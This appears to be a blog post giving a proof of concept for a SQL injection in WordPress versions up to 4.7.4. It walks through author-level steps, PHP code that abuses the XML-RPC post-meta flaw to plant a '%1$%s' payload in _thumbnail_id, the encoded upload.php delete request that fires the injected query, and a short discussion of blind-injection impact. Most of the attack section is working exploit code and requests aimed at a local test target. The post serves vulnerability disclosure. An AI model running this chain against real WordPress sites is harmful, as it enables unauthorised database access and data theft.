Wordpress SQLi — PoC

In order to understand the writing here, you need to read the previous explanation https://medium.com/websec/wordpress-sqli-bbb2afcc8e94. If you got it, then we can jump to the part and solve the question e.g. how to update / insert our sql payload into _thumbnail_id post meta.

PoC start

  • Login to your wordpress as author
  • Upload image
  • Remember ID of the image / media
  • Create post and set image as featured image (this creates _thumbnail_id post meta)
  • Remember the post ID

Wordpress ≤ 4.7.4 XML-RPC

In case of appropriate wordpress version then we can use the third vulnerability in this versions of wordpress https://wordpress.org/news/2017/05/wordpress-4-7-5/ e.g.

Lack of capability checks for post meta data in the XML-RPC API.

This means that we can edit the value of _thumbnail_id with the following code ( 6 is the post ID and 5 is image/post ID )

$usr = 'author';
$pwd = 'author';
$xmlrpc = 'http://local.target/xmlrpc.php';
$client = new IXR_Client($xmlrpc);
$content = array("ID" => 6, 'meta_input' => array("_thumbnail_id"=>"5 %1$%s hello"));
$res = $client->query('wp.editPost',0, $usr, $pwd, 6/*post_id*/, $content);

and with this code we add the following payload in the DB 5 %1$%s hello .

Wordpress importer plugin — any version of wordpress

This is another approach for changing the _thumbnail_id value in the database. If wordpress instance have enabled this plugin on it, then simple export, change meta value and import will do the job.

Execute the SQL payload

Login to the administration panel with your author account, go to media e.g. http://local.target/wp-admin/upload.php , grab the _wpnonce value and we are ready to prove our SQLi vulnerability. Issue the following request towards your local instance:

local.target/wp-admin/upload.php?_wpnonce=daab7cfabf&action=delete&media%5B%5D=5%20%251%24%25s%20hello

where 5%20%251%24%25s%20hello is url encoded 5 %1$%s hello. This request will result with execution of the following query against the DB (will rise error of course):

SELECT post_id FROM wp_postmeta WHERE meta_key = '_thumbnail_id' AND meta_value = '5 _thumbnail_id' hello'

This proves the SQLi vulnerability in the wordpress and as mention in previous post value after 5 %1$%s e.g. hello is our payload.

Is this vulnerability dangerous?

SQL injection itself is quite dangerous vulnerability, but sometimes have its own limitations. Here at our case depending of the database server configuration or mysql client used on PHP side could be fatal, but in our case best case scenario would be blind sql injection. Sure, we all know the trivial attack vector, but here we have 2 facts that go against wordpress:

  • meta value database column type e.g. size constraint
  • media parameter could be POST parameter e.g. will have huge size

This two facts guide us to the conclusion that even with blind sqli one query would be enough to calculate some crucial DB cell value.

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.